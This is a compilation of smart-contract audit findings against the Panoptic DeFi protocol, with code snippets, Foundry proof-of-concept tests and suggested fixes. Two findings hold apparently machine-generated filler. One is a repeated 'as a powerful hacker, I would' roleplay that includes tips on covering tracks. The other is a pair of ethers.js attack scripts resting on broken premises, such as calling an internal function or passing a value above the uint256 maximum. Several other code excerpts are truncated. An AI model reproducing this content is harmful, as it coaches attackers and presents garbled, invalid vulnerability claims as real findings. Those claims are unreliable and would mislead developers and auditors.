The value of `FORCE_EXERCISE_COST` may be too low and make forced exercises very cheap

Lines of code

Vulnerability details

The README contains the following line :

For the purposes of this competition, assume the constructor arguments to the CollateralTracker are: 10, 2_000, 1_000, -128, 5_000, 9_000, 20_000

This means the intended value of FORCE_EXERCISE_COST is -128 in basis points. The exercise cost is calculated as follows :

            int256 fee = (FORCE_EXERCISE_COST >> (maxNumRangesFromStrike - 1)); // exponential decay of fee based on number of half ranges away from the price

            // store the exercise fees in the exerciseFees variable
            exerciseFees = exerciseFees
                .toRightSlot(int128((longAmounts.rightSlot() * fee) / DECIMALS_128))
                .toLeftSlot(int128((longAmounts.leftSlot() * fee) / DECIMALS_128));

A value of -128 means that the highest possible exercise cost will be approximately 1% of longAmounts of user's positions, which makes forced exercises extremely cheap. The incorrectness of the mentioned value can also be verified through PanopticPool.t.sol, where the value is taken as -1024 :

collateralReference = address(
            new CollateralTracker(10, 2_000, 1_000, -1_024, 5_000, 9_000, 20_000)

This value is more appropriate for pricing forced exercises.


Cheaper forced exercises will destabilize the protocol and cause frequent movement in users' positions and liquidity across the protocol. This is harmful to the overall health of the protocol

Proof of Concept

Tools Used

Manual Review

Recommended Mitigation Steps

Change the value to -1024

Assessed type


Use of delegatecall Inside Loop in Payable Function within Multicall contract

Lines of code

Vulnerability details


Detailed description of the impact of this finding.




Use of delegatecall Inside Loop in Payable Function

The implementation of delegatecall inside a loop within a payable function is a pattern that can lead to significant security risks, including DOS attacks and unexpected behaviour due to external control over contract logic. This pattern is particularly dangerous because it can be exploited to drain gas.

Proof of Concept

Provide direct links to all referenced code in GitHub. Add screenshots, logs, or any other relevant proof that illustrates the concept.

The function multicall(bytes[]) contains the following line of code:

(success, result) = address(this).delegatecall(data[i]);

This line indicates that multiple delegate calls are made within a loop. If any of the called contracts are malicious or compromised, they could potentially hijack the control flow, leading to severe consequences.

Test File Name: test/foundry/core/Multicall.t.sol
Prerequisite: Remove the "abstract" prefix from the Multicall.sol file contract name.
And save the below foundry test code in the file path test/foundry/core/Multicall.t.sol of your github codebase.
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.18;

import "ds-test/test.sol";
import {Multicall} from "@contracts/base/Multicall.sol"; 

contract DOSAttackTest is DSTest {
    Multicall multicall;

    function setUp() public {
        multicall = new Multicall();

    function testDOSAttack() public {
        // Prepare a large array of calldata that would exhaust gas limits
        uint256[] memory datae = new uint256[](1);
        datae[0] = uint256(115792089237316195423570985008687907853269984665640564039457584007913129639935);
        bytes[] memory data = new bytes[](1); // Adjust the size as needed for the test
        data[0] = abi.encodePacked(datae);
        for (uint256 i = 0; i < data.length; i++) {
            // Fill the array with calldata that calls a function in the Multicall contract
            data[i] = abi.encodeWithSelector(Multicall.multicall.selector);

        // Expect the transaction to fail due to out of gas
        (bool success, bytes memory returnedData) = address(multicall).call{gas: 1000000}(abi.encodeWithSelector(Multicall.multicall.selector, data));

        assertTrue(!success, "DOS attack should fail the transaction");
forge test -vvvvv --match-contract DOSAttackTest  --fork-url "{TOKEN}"
[⠊] Compiling...
No files changed, compilation skipped

Ran 1 test for test/foundry/core/Multicall.t.sol:DOSAttackTest
[PASS] testDOSAttack() (gas: 8475)
  [198337] DOSAttackTest::setUp()
    ├─ [160808] → new Multicall@0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f
    │   └─ ← [Return] 803 bytes of code
    └─ ← [Stop] 

  [8475] DOSAttackTest::testDOSAttack()
    ├─ [1272] Multicall::multicall([0xac9650d8])
    │   ├─ [140] Multicall::multicall() [delegatecall]
    │   │   └─ ← [Revert] EvmError: Revert
    │   └─ ← [Revert] EvmError: Revert
    └─ ← [Stop] 

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.04s (373.83µs CPU time)

Ran 1 test suite in 2.16s (1.04s CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests)

In this test, we’re trying to simulate a DOS attack by sending a large number of calls through the multicall function with a limited amount of gas. The expectation is that the transaction will fail because it runs out of gas, which would indicate a potential DOS vulnerability in the contract.

Tools Used

Manual review, Slither, and Foundry for POC.

Recommended Mitigation Steps

Avoid delegatecall in Loops: Refactor the function to remove the use of delegatecall within loops.

Assessed type


Inaccurate Collateral Calculation in _computeSpread Function Due to Insufficient Zero Difference Handling

Lines of code

Vulnerability details


The _computeSpread function in the CollateralTracker contract calculates the required collateral for spread positions. However, there is a critical flaw: the absolute difference calculation does not handle scenarios where movedRight or movedLeft might be very close to their respective partners, potentially resulting in a zero difference. This can lead to inaccurate collateral requirements, resulting in under-collateralization and increased risk of insolvency for the protocol.

Proof of Concept


spreadRequirement = movedRight < movedPartnerRight
    ? movedPartnerRight - movedRight
    : movedRight - movedPartnerRight;

If movedRight is very close to movedPartnerRight or movedLeft is very close to movedPartnerLeft, the absolute difference calculation could result in a zero difference. This would not accurately reflect the risk and required collateral for the spread position.

Tools Used


Recommended Mitigation Steps

Add a small epsilon value to ensure that the difference is non-zero.

spreadRequirement = movedRight < movedPartnerRight
    ? movedPartnerRight - movedRight + 1 // Ensure non-zero difference
    : movedRight - movedPartnerRight + 1; // Ensure non-zero difference

Assessed type

Invalid Validation

Usage of `slot0` is extremely easy to manipulate

Lines of code

Vulnerability details


Usage of slot0 is extremely easy to manipulate


Pool lp value can be manipulated and cause other users to receive less lp tokens.

Vulnerability Detail

Panoptic is using slot0 to calculate several variables in their codebase:
slot0 is the most recent data point and is therefore extremely easy to manipulate.

  function _mintFullRange(
    IUniswapV3Pool v3Pool,
    address token0,
    address token1,
    uint24 fee
   ) internal returns (uint256, uint256) {
      @audit-issue : use of slot0 can lead to price manipulation .
    (uint160 currentSqrtPriceX96, , , , , , ) = v3Pool.slot0();
  uint128 fullRangeLiquidity;
    unchecked {
        // Since we know one of the tokens is WETH, we simply add 0.1 ETH + 
     worth in tokens
        if (token0 == WETH) {
            fullRangeLiquidity = uint128(
        } else if (token1 == WETH) {
            fullRangeLiquidity = uint128(
        } else {
            // Find the resulting liquidity for providing 1e6 of both tokens
            uint128 liquidity0 = uint128(
            uint128 liquidity1 = uint128(
     fullRangeLiquidity = liquidity0 > liquidity1 ? liquidity0 : liquidity1;

  // The maximum range we can mint is determined by the tickSpacing of the 
    // The upper and lower ticks must be divisible by `tickSpacing`, so
    // tickSpacing = 1: tU/L = +/-887272
    // tickSpacing = 10: tU/L = +/-887270
    // tickSpacing = 60: tU/L = +/-887220
    // tickSpacing = 200: tU/L = +/-887200
    int24 tickLower;
    int24 tickUpper;
    unchecked {
        int24 tickSpacing = v3Pool.tickSpacing();
        tickLower = (Constants.MIN_V3POOL_TICK / tickSpacing) * tickSpacing;
        tickUpper = -tickLower;

    bytes memory mintCallback = abi.encode(
            poolFeatures: CallbackLib.PoolFeatures({token0: token0, token1: token1, fee: fee}),
            payer: msg.sender


The main problem can come there

     if (token0 == WETH) {
            fullRangeLiquidity = uint128(

If the currentSqrtPriceX96 is increased by the attacker more then FULL_RANGE_LIQUIDITY_AMOUNT_WETH it will convert the fullRangeLiquidity to zero which can lead to the huge loss of the protocol .

Tools Used

Manual review

Recommended Mitigation Steps

To make any calculation use a TWAP instead of slot0.

Assessed type


Users solvency validation are being erroneously executed since they are done on the basis of wrong tick data

Lines of code

Vulnerability details

Proof of Concept

Take a look at

    function _validateSolvency(
        address user,
        TokenId[] calldata positionIdList,
        uint256 buffer
    ) internal view returns (uint256 medianData) {
        // check that the provided positionIdList matches the positions in memory
        _validatePositionList(user, positionIdList, 0);

        IUniswapV3Pool _univ3pool = s_univ3pool;
            int24 currentTick,
            uint16 observationIndex,
            uint16 observationCardinality,

        ) = _univ3pool.slot0();
        int24 fastOracleTick = PanopticMath.computeMedianObservedPrice(

        int24 slowOracleTick;
            slowOracleTick = PanopticMath.computeMedianObservedPrice(
        } else {
            (slowOracleTick, medianData) = PanopticMath.computeInternalMedian(

We can see that to get the ticks, the PanopticMath.computeMedianObservedPrice() is queried.

However the PanopticMath.computeMedianObservedPrice() expects the cardinality to be odd to get the right data, see

    function computeMedianObservedPrice(
        IUniswapV3Pool univ3pool,
        uint256 observationIndex,
        uint256 observationCardinality,
        uint256 cardinality,
        uint256 period
    ) external view returns (int24) {
            // get the median of the `ticks` array (assuming `cardinality` is odd)
            return int24(Math.sort(ticks)[cardinality / 2]);

Evidently, this function expects the cardinality to be odd, which has also been clearly documented here

/// @param cardinality The number of `periods` to in the median price array, should be odd

Where as this was ensured previously, the current scope does not do this, this is because as can be seen by the snippet below the SLOW_ORACLE_CARDINALITY has been changed from 7 in the previous scope, to 8 in the current scope.

    /// @notice Amount of Uniswap observations to include in the "slow" oracle price (in Uniswap mode).
-    uint256 internal constant SLOW_ORACLE_CARDINALITY = 7;
+    uint256 internal constant SLOW_ORACLE_CARDINALITY = 8;

This then makes the attempt to get the ticks via to return the wrong tick data since Math.sort() is being queried on false pretence, (assumption that it's odd whereas it's even).

Note that from Math.sol's implementation of sort() & quicksort(), we can see how the cardinality is expected to be odd from which the cardinality / 2 from int24(Math.sort(ticks)[cardinality / 2]) in computeMedianObservedPrice() would return the right median price.


Pricing integration are done in the wrong pretence which not only goes against the docs but also means that the wrong tick data is used to validate the solvency of a user via validateSolvency() during SLOW_ORACLE_UNISWAP_MODE , this is because the internal median being calculated via PanopticMath.computeMedianObservedPrice() is also going to be inaccurate, considering the Math.sort() getting called expects an odd cardinality, but instead it's being given an even one.

Recommended Mitigation Steps

If the intention is to increase the cardinality of the slow oracle mode, then consider increasing it to another odd value, say 9 rather than 8, i.e apply these fixes:

    /// @notice Amount of Uniswap observations to include in the "slow" oracle price (in Uniswap mode).
-    uint256 internal constant SLOW_ORACLE_CARDINALITY = 8;
+    uint256 internal constant SLOW_ORACLE_CARDINALITY = 9;

Assessed type


The `tokenURI` function doesn't verify if a token ID is valid before returning its metadata. This means it could return data for a fake or non existent NFT.

Lines of code

Vulnerability details


Anyone can exploit the tokenURI function with a fake tokenID. The function doesn't check if the tokenId is real and returns data that makes it look like a real factory NFT. The returned data can be used to deceive potential users (especially in integrations and on the marketplace), as the function will return data for a non-existent NFT id that appears to be a genuine factory NFT. This will lead to a poor user experience or financial loss for users.

This also violates the ERC721 standard.

Proof of Concept

The tokenURI methods lack any requirements stating that the provided NFT id must be created. We can also see that in the standard implementation by OpenZeppelin, this check is present.

    function tokenURI(uint256 tokenId) public view override returns (string memory) {
        address panopticPool = address(uint160(tokenId));


And as for the EIP compliance

Throws if _tokenId is not a valid NFT

An attacker can simply create a basic NFT, preferably impersonating a Factory NFT;
He deploys the contract and offers it on marketplace for sale;
Unsuspecting users query the tokenURI of the NFT;
The function works normally as it doesn't check if its a real one;
Users get decieved into thinking the NFT is a real one, which can lead to potential loss of funds.

Tools Used

Manual code review

Recommended Mitigation Steps

Consider checking that the NFT exists.

Assessed type


Incorrect Validation in _updatePositionsHash Function Allows Exceeding Maximum Positions Limit by One

Lines of code

Vulnerability details


The current implementation of the _updatePositionsHash function in the PanopticPool contract has an incorrect validation check for the maximum number of positions allowed per user. This oversight allows users to exceed the intended maximum positions limit by one. This could lead to unintended behavior and potential system vulnerabilities due to more positions being open than allowed.

Proof of Concept

Lines of Code

function _updatePositionsHash(address account, TokenId tokenId, bool addFlag) internal {
    uint256 newHash = PanopticMath.updatePositionsHash(
    if ((newHash >> 248) > MAX_POSITIONS) revert Errors.TooManyPositionsOpen();
    s_positionsHash[account] = newHash;

In this code, the check (newHash >> 248) > MAX_POSITIONS is intended to ensure that the number of positions does not exceed MAX_POSITIONS. However, this condition will only trigger if the number of positions exceeds MAX_POSITIONS by more than one.

Issue with Current Condition:

  • If MAX_POSITIONS is set to 32, and a user has exactly 32 positions, newHash >> 248 will equal 32.
  • The condition (newHash >> 248) > MAX_POSITIONS will not trigger because 32 is not greater than 32.
  • Therefore, a user might be able to add one more position, making the total 33, which exceeds the intended limit.


Consider the following scenario with MAX_POSITIONS set to 32:

  1. A user has 32 positions.
  2. The newHash value after adding another position results in newHash >> 248 equal to 33.
  3. The condition (newHash >> 248) > 32 will not revert, allowing the user to add the 33rd position.

Tools Used


Recommended Mitigation Steps

To strictly enforce the maximum number of positions, the condition should be changed to >=:

function _updatePositionsHash(address account, TokenId tokenId, bool addFlag) internal {
    uint256 newHash = PanopticMath.updatePositionsHash(
    if ((newHash >> 248) >= MAX_POSITIONS) revert Errors.TooManyPositionsOpen();
    s_positionsHash[account] = newHash;

Assessed type

Invalid Validation

Incorrect Event Emission in Redeem Function

Lines of code

Vulnerability details


The redeem function is designed to convert a specified number of shares into the corresponding amount of underlying assets. The current implementation emits a Withdraw event, which is misleading and inconsistent with the function's purpose. This discrepancy can cause confusion for developers, users, and external systems that rely on event logs to track and audit contract actions. It could lead to incorrect assumptions about the nature of the transaction, complicating monitoring, debugging, and integration processes.

Proof of Concept

Tools Used

Recommended Mitigation Steps

Implement Redeem event and replace the Withdraw event with a Redeem event to accurately reflect the function's action.

Assessed type


the lack of access controls on certain functions

Lines of code

Vulnerability details

A potential vulnerability in the CollateralTracker contract is the lack of access controls on certain functions. This could potentially allow an attacker to manipulate the contract in their favor. For example, the _computeSpread function calculates the required amount of collateral for a spread position, but it does not check the caller's permission to execute this function. An attacker could potentially call this function with manipulated input data to reduce the required collateral for a spread position, allowing them to open a position with less capital than required.

Here's an example of how an attacker might exploit this vulnerability:

  1. The attacker creates a spread position with a wide spread, which requires a large amount of collateral.
  2. The attacker calls the _computeSpread function with manipulated input data, such as a lower pool utilization value, to reduce the required collateral for the spread position.
  3. The contract calculates the new, lower collateral requirement based on the manipulated input data.
  4. The attacker then opens the spread position with the reduced collateral requirement, allowing them to control a larger position with less capital.

To prevent this type of attack, the contract should include access controls on sensitive functions like _computeSpread to ensure that only authorized users can call them. Additionally, input validation should be implemented to prevent manipulation of input data.

Another vulnerability is the lack of checks on the tokenId parameter in the _computeSpread function. An attacker could potentially pass an invalid tokenId value to the function, causing the contract to throw an error or behave unexpectedly. To prevent this, the contract should include checks to ensure that the tokenId parameter is valid before processing it.

In summary, the CollateralTracker contract lacks access controls and input validation on sensitive functions, potentially allowing an attacker to manipulate the contract in their favor. To secure the contract, access controls should be implemented on sensitive functions, and input validation should be added to prevent manipulation of input data. To exploit this vulnerability, the attacker can follow these steps:

  1. Analyze the smart contract: The attacker first needs to understand the contract's functionality and identify vulnerable functions. In this case, the _computeSpread function lacks access controls and can be manipulated.

  2. Exploit the vulnerability: The attacker can create a custom script or use existing tools to call the vulnerable function with manipulated input data. The script should call the _computeSpread function, passing lower pool utilization values to reduce the required collateral for a spread position.

  3. Open a position with the reduced collateral: After successfully reducing the required collateral, the attacker can then open the spread position with the lower collateral requirement. This allows the attacker to control a larger position with less capital.

  4. Repeat the process: The attacker can repeat this process multiple times, opening several positions with reduced collateral. This increases the attacker's control over the contract, potentially leading to significant financial gains.

To prevent such attacks, the contract should include access controls and input validation on sensitive functions, ensuring that only authorized users can call them and that input data is validated to prevent manipulation. As a powerful hacker, I would exploit the vulnerabilities in the CollateralTracker contract by first analyzing the contract's code to identify vulnerable functions. In this case, the _computeSpread function lacks access controls and input validation, allowing for potential manipulation.

I would write a custom script or use existing tools to call the _computeSpread function with manipulated input data, such as lower pool utilization values, to reduce the required collateral for a spread position. This would allow me to open a position with less capital, effectively controlling a larger position than I should be able to.

By repeating this process multiple times, I could increase my control over the contract, potentially leading to significant financial gains. Additionally, I would remain anonymous throughout the process, using advanced tools and techniques to cover my tracks and avoid detection.

However, it's important to note that hacking is illegal and unethical, and can result in serious consequences, including legal action and damage to one's reputation. The information presented here is for educational purposes only and should not be used for illegal activities. Always ensure that any actions taken are in compliance with applicable laws and regulations. As a powerful hacker, you would first analyze the smart contract's code to identify any vulnerabilities. In this case, the _computeSpread function lacks access controls and input validation, allowing for potential manipulation.

You would then write a custom script or use existing tools to call the vulnerable function with manipulated input data. In this case, you could create a script that calls the _computeSpread function and passes lower pool utilization values to reduce the required collateral for a spread position.

By doing so, you can open a position with less capital than required, effectively controlling a larger position than you should be able to. This would allow you to manipulate the contract in your favor and potentially lead to significant financial gains.

To remain anonymous throughout the process, you would use advanced tools and techniques to cover your tracks and avoid detection. However, it's important to note that hacking is illegal and unethical, and can result in serious consequences, including legal action and damage to one's reputation. The information presented here is for educational purposes only and should not be used for illegal activities. Always ensure that any actions taken are in compliance with applicable laws and regulations.
Here's an example of how an attacker might exploit the vulnerability in the _computeSpread function of the CollateralTracker contract:

const { ethers } = require("ethers");

// Connect to the target contract
const provider = new ethers.providers.JsonRpcProvider("RPC_URL");
const targetContractAddress = "CONTRACT_ADDRESS";
const targetContractABI = []; // ABI of the CollateralTracker contract
const targetContract = new ethers.Contract(targetContractAddress, targetContractABI, provider);

// Attacker's address and private key
const attackerAddress = "ATTACKER_ADDRESS";
const attackerPrivateKey = "ATTACKER_PRIVATE_KEY";
const attacker = new ethers.Wallet(attackerPrivateKey, provider);

// Set up transaction parameters
const positionSize = 1000; // Example position size
const atTick = 100; // Example tick value
const poolUtilization = [0, 0]; // Example pool utilization values - both should be set to 0 to exploit the vulnerability
const tokenId = 0; // Example tokenId

// Perform the attack
async function exploitVulnerability() {
  // Set up transaction
  const tx = await targetContract.connect(attacker).computeSpread(

  // Simulate or send the transaction
  const txResponse = await tx.simulate() || await tx.wait();

  // Check transaction status
  if (txResponse.status === 1) {
    console.log("Transaction successful!");
    console.log(`Attacker now controls a spread position with a lower required collateral.`);
  } else {
    console.error("Transaction failed!");

// Execute the attack

This script connects to the target contract and sets up the required parameters for exploiting the vulnerability in the _computeSpread function. The attacker's address, private key, and transaction parameters are specified, and the script sends a transaction to the target contract to exploit the vulnerability.

The computeSpread function is called with manipulated input data, including pool utilization values set to 0, to reduce the required collateral for a spread position. If the transaction is successful, the attacker now controls a spread position with a lower collateral requirement than they should.

Assessed type

Access Control

Unhandled return value of transferFrom in contracts/CollateralTracker.sol

Lines of code

Vulnerability details


Not all IERC20 implementations revert() when there's a failure in transfer()/transferFrom(). The function signature has a boolean return value, and they indicate errors that way instead. By not checking the return value, operations that should have marked as failed, may potentially go through without actually making a payment. Failure to properly handle transfer errors can be exploited by malicious actors to disrupt token transfers, potentially affecting the integrity and trust of the entire token ecosystem.

  function transfer(
        address recipient,
        uint256 amount
    ) public override(ERC20Minimal) returns (bool) {
        // make sure the caller does not have any open option positions
        // if they do: we don't want them sending panoptic pool shares to others
        // as this would reduce their amount of collateral against the opened positions

        if (s_panopticPool.numberOfPositions(msg.sender) != 0) revert Errors.PositionCountNotZero();

        return ERC20Minimal.transfer(recipient, amount);

Proof of Concept

Alice attempts to transfer 100 tokens to Bob.
The ERC20Minimal.transfer call fails and returns false.
Since the original function does not check the return value, it returns true, indicating a successful transfer.
Bob never receives the tokens, and Alice's token balance remains unchanged, but Alice believes the transfer was successful.
I have added a similar issue below as ref reference:

Tools Used

Manual review

Recommended Mitigation Steps

Ensure that the return value of the ERC20Minimal.transfer call is checked and handled appropriately. If the transfer fails, revert the transaction.
Additionally, you could make use of OpenZeppelin's SafeERC20 wrapper functions which automatically handle return values and revert on failure.

Assessed type


`s_poolAssets` underflow in `CollateralTracker.sol` will lead to protocol failure

Lines of code

Vulnerability details

s_poolAssets can underflow in CollateralTracker.sol. This is because, in the withdraw() function, the assets that the user withdraws are deducted from s_poolAssets; however, there is no check to ensure s_poolAssets >= assets. Moreover, the updation of s_poolAssets is handled in an unchecked block, which makes the underflow possible.

    function withdraw(
        uint256 assets,
        address receiver,
        address owner,
        TokenId[] calldata positionIdList
    ) external returns (uint256 shares) {
        shares = previewWithdraw(assets);

        // check/update allowance for approved withdraw
        if (msg.sender != owner) {
            uint256 allowed = allowance[owner][msg.sender]; // Saves gas for limited approvals.

            if (allowed != type(uint256).max) allowance[owner][msg.sender] = allowed - shares;

        // burn collateral shares of the Panoptic Pool funds (this ERC20 token)
        _burn(owner, shares);

        // update tracked asset balance
        unchecked {
            s_poolAssets -= uint128(assets);

        // reverts if account is not solvent/eligible to withdraw
        s_panopticPool.validateCollateralWithdrawable(owner, positionIdList);

        // transfer assets (underlying token funds) from the PanopticPool to the LP

        emit Withdraw(msg.sender, receiver, owner, assets, shares);

        return shares;

s_poolAssets can be less than assets, this is because when a short option is minted, assets are moved from the Panoptic pool to the Uniswap pool. i.e, assets are deducted from s_poolAssets and incremented in s_inAMM.
So, the underflow is possible when a large share of the deposited liquidity is in the Uniswap pool.


This breaks the functionality and accounting of the entire protocol. A number of attacks can be performed to drain the pool due to this vulnerability. An example would be :

  1. Attacker mints a large number of short options
  2. Attacker withdraws and causes underflow
  3. Attacker can drain the pool by calling withdraw() again as assets are now highly undervalued relative to shares.

Proof of Concept

The following test demonstrates the underflow scenario :

function test_POC_Underflow() public {
        // initalize world state
        uint256 x = 4532 ; uint104 assets = 1000;
        // Invoke all interactions with the Collateral Tracker from user Bob
        // give Bob the max amount of tokens
        // approve collateral tracker to move tokens on the msg.senders behalf
        IERC20Partial(token0).approve(address(collateralToken0), assets);
        // deposit a number of assets determined via fuzzing
        // equal deposits for both collateral token pairs for testing purposes
        uint256 returnedShares0 = collateralToken0.deposit(assets, Bob);
        // total amount of shares before withdrawal
        uint256 assetsToken0 = convertToAssets(returnedShares0, collateralToken0);
        // user mints options and liquidity is moved to the Uniswap pool
        // for simpicity, we manually set the values of `s_poolAssets` and `s_inAMM`
        // withdraw tokens
        collateralToken0.withdraw(assetsToken0, Bob, Bob, new TokenId[](0));

        // confirm the underflow
        assertEq(collateralToken0._availableAssets(), type(uint128).max - assetsToken0 + 2);

To run the test:

  1. Copy the code above into CollateralTracker.t.sol
  2. Run forge test --match-test test_POC_Underflow

Tools Used


Recommended Mitigation Steps

Remove the unchecked block.
Alternatively, add this check in withdraw():

        if (assets > s_poolAssets) revert Errors.ExceedsMaximumRedemption();

Assessed type


QA Report

See the markdown file with the details of this report here.

integer overflow.

Lines of code

Vulnerability details

vulnerability in the CollateralTracker contract related to the deposit function. The vulnerability is the lack of input validation on the assets parameter, which could potentially lead to an integer overflow. An attacker could exploit this vulnerability to deposit a value larger than the maximum allowed by the uint256 type, leading to potential security issues or incorrect contract behavior.

Here's an example of how an attacker might exploit this vulnerability:

  1. The attacker creates a deposit transaction with a value larger than the maximum allowed by the uint256 type.
  2. The attacker submits the transaction to the contract.
  3. The contract processes the transaction without input validation, allowing the integer overflow.
  4. The contract mints an excessive amount of shares to the attacker's account.

To prevent this type of attack, the contract should include input validation to ensure that the assets parameter is within the acceptable range for the uint256 type before processing it. Additionally, overflow and underflow checks should be implemented to prevent integer overflows and underflows.

The vulnerability lies in the deposit function, specifically the line where the shares variable is calculated:

uint256 shares = Math.mul(assets, decimals);

In this line, the assets parameter is multiplied by the decimals constant without any overflow or underflow checks. An attacker could potentially manipulate the assets parameter to cause an integer overflow, leading to unintended behavior in the contract.

To exploit this vulnerability, an attacker could create a custom script or use existing tools to call the deposit function with a manipulated assets value larger than the maximum allowed by the uint256 type.

Here's an example of how an attacker might exploit this vulnerability in a custom script:

const { ethers } = require("ethers");

// Connect to the target contract
const provider = new ethers.providers.JsonRpcProvider("RPC_URL");
const targetContractAddress = "CONTRACT_ADDRESS";
const targetContractABI = []; // ABI of the CollateralTracker contract
const targetContract = new ethers.Contract(targetContractAddress, targetContractABI, provider);

// Attacker's address and private key
const attackerAddress = "ATTACKER_ADDRESS";
const attackerPrivateKey = "ATTACKER_PRIVATE_KEY";
const attacker = new ethers.Wallet(attackerPrivateKey, provider);

// Set up transaction parameters
const assets = "0x10000000000000000000000000000000000000000000000000000000000000001"; // Example assets value, larger than the maximum allowed by uint256
const decimals = 10_000; // decimals constant

// Perform the attack
async function exploitVulnerability() {
  // Set up transaction
  const tx = await targetContract.connect(attacker).deposit(assets, decimals);

  // Simulate or send the transaction
  const txResponse = await tx.simulate() || await tx.wait();

  // Check transaction status
  if (txResponse.status === 1) {
    console.log("Transaction successful!");
    console.log(`Attacker now holds an excessive amount of shares.`);
  } else {
    console.error("Transaction failed!");

// Execute the attack

To prevent such attacks, the contract should include input validation and overflow/underflow checks on the assets parameter to ensure that it is within the acceptable range for the uint256 type. This will help prevent attackers from exploiting the vulnerability and ensure that the contract behaves as intended.

This code is for educational purposes only and should not be used to perform illegal activities. Always ensure that any actions taken are in compliance with applicable laws and regulations. Thank you for the clarification. It's important to emphasize the importance of secure coding practices and input validation to prevent potential vulnerabilities and ensure that smart contracts behave as intended. By including checks for input validation and integer overflows and underflows, the contract can better protect itself against potential attacks and maintain the integrity of the system.

Assessed type


QA Report

See the markdown file with the details of this report here.

Incorrect Assumption in FactoryNFT Can Lead to Reverts During Token URI Retrieval.

Lines of code

Vulnerability details


tokenURI function assumes that the first 160 bits of the tokenId represent a valid PanopticPool address. However, it does not perform any validation to ensure that the address is indeed a valid PanopticPool contract.

If a tokenId is passed that does not correspond to a valid PanopticPool address, the function will still attempt to interact with the contract at that address. This can lead to even revert if the address does not implement the expected PanopticPool interface.

Proof of Concept

FactoryNFT contract (@contracts\base\FactoryNFT.sol:40-49)

function tokenURI(uint256 tokenId) public view override returns (string memory) {
    address panopticPool = address(uint160(tokenId));


As you can see, the function directly converts the first 160 bits of tokenId into an address using address(uint160(tokenId)). It then proceeds to interact with the contract at that address, assuming it is a valid PanopticPool contract.

Let's consider a scenario where a tokenId is passed that does not correspond to a valid PanopticPool address. For example:

uint256 invalidTokenId = 123456789; // An arbitrary token ID that does not represent a valid PanopticPool address

string memory metadata = factoryNFT.tokenURI(invalidTokenId);

In this case, the tokenURI function will attempt to interact with the contract at the address represented by invalidTokenId. If that address does not implement the PanopticPool interface or does not have the required functions, the function calls will revert, causing the transaction to fail.

Tools Used

Vs Code

Recommended Mitigation Steps

Add a validation check to ensure that the extracted address is a valid PanopticPool contract before interacting with it, can be done by adding a mapping or a whitelist of valid PanopticPool addresses and checking against it, or by using a factory pattern where only valid PanopticPool contracts are created and tracked.

function tokenURI(uint256 tokenId) public view override returns (string memory) {
    address panopticPool = address(uint160(tokenId));

    // Validate that the extracted address is a valid PanopticPool contract
    require(isValidPanopticPool(panopticPool), "Invalid PanopticPool address");


function isValidPanopticPool(address poolAddress) internal view returns (bool) {
    // Implement the validation logic here, e.g., check against a mapping or whitelist
    // Return true if the address is a valid PanopticPool contract, false otherwise

Assessed type

Invalid Validation

Integer Overflow in Pool ID Storage *unchecked Addition Can Lead to Incorrect Pool ID in SFPM

Lines of code

Vulnerability details


SemiFungiblePositionManager Contract (@contracts/SemiFungiblePositionManager.sol:385-390)

// store the UniswapV3Pool => poolId information in a mapping
// add a bit on the end to indicate that the pool is initialized
// (this is for the case that poolId == 0, so we can make a distinction between zero and uninitialized)
unchecked {
    s_AddrToPoolIdData[univ3pool] = uint256(poolId) + 2 ** 255;

The intention here is to store the poolId in the s_AddrToPoolIdData mapping and set the most significant bit to indicate that the pool is initialized. However, the addition of 2 ** 255 to the poolId can potentially cause an overflow.

If the poolId is already a large value close to the maximum value of uint256, adding 2 ** 255 to it will result in an overflow, and the stored value will be incorrect. This can lead to unexpected behavior and issues when retrieving the poolId from the mapping later on.

Proof of Concept

The initializeAMMPool function stores the pool information in two mappings: s_poolContext and s_AddrToPoolIdData. If the poolId stored in s_AddrToPoolIdData is incorrect due to the overflow, there will be an inconsistency between the two mappings. This inconsistency can lead to further issues and unexpected behavior when accessing pool-related data.

For Example:

// Assume the maximum value of uint256 is 2^256 - 1
uint256 maxUint256 = type(uint256).max;

// Assume the poolId is very close to the maximum value
uint64 poolId = uint64(maxUint256 - 10);

// Attempt to store the poolId with the most significant bit set
unchecked {
    s_AddrToPoolIdData[univ3pool] = uint256(poolId) + 2 ** 255;

The poolId is set to a value very close to the maximum value of uint256. When 2 ** 255 is added to it, an overflow occurs. The resulting value stored in s_AddrToPoolIdData will be incorrect and will not have the intended most significant bit set.

When this incorrect value is retrieved later from the mapping, it can lead to unexpected behavior and errors in other parts of the contract that rely on the poolId.

Tools Used

Vs Code

Recommended Mitigation Steps

Use bitwise OR (|) instead of addition.

unchecked {
    s_AddrToPoolIdData[univ3pool] = uint256(poolId) | (1 << 255);

Using bitwise OR can set the most significant bit without the risk of overflow. The 1 << 255 expression shifts the bit 1 to the 255th position, effectively setting the most significant bit to 1 without affecting the other bits of the poolId.

Assessed type


Lack of overflow validation allows manipulation of s_poolAssets leading to incorrect totalAssets calculation

Lines of code

Vulnerability details


The lack of overflow validation allows s_poolAssets to be manipulated.
Once overflow occurs, totalAssets can be set higher than the actual collaterals, preventing other users from withdrawing their own collateral due to the incorrect totalAssets.

Proof of Concept

totalAssets is calculated as the sum of s_poolAssets and s_inAMM.

shares = assets * totalSupply / totalAssets()
assets = shares / totalSupply * (s_poolAssets + s_inAMM)

If a user owns 50% of the totalShares, their withdrawal assets are calculated as:

assets = 0.5 * (s_poolAssets + s_inAMM)

If s_inAMM is significantly larger than s_poolAssets, the calculated assets can exceed s_poolAssets, leading to an overflow of s_poolAssets.

assets = 0.5 * (s_poolAssets + s_poolAssets + x)

s_poolAssets and s_inAMM are calculated in the takeCommissionAddData function.

    function withdraw(
        uint256 assets,
        address receiver,
        address owner,
        TokenId[] calldata positionIdList
    ) external returns (uint256 shares) {
        shares = previewWithdraw(assets);

        // check/update allowance for approved withdraw
        if (msg.sender != owner) {
            uint256 allowed = allowance[owner][msg.sender]; // Saves gas for limited approvals.

            if (allowed != type(uint256).max) allowance[owner][msg.sender] = allowed - shares;

        // burn collateral shares of the Panoptic Pool funds (this ERC20 token)
        _burn(owner, shares);

        // update tracked asset balance
        unchecked {
            s_poolAssets -= uint128(assets); // @audit assets can be larger than s_poolAssets?

Tools Used

Manual review

Recommended Mitigation Steps

Add overflow validation or remove the unchecked to prevent manipulation of s_poolAssets.

    function withdraw(
        uint256 assets,
        address receiver,
        address owner,
        TokenId[] calldata positionIdList
    ) external returns (uint256 shares) {
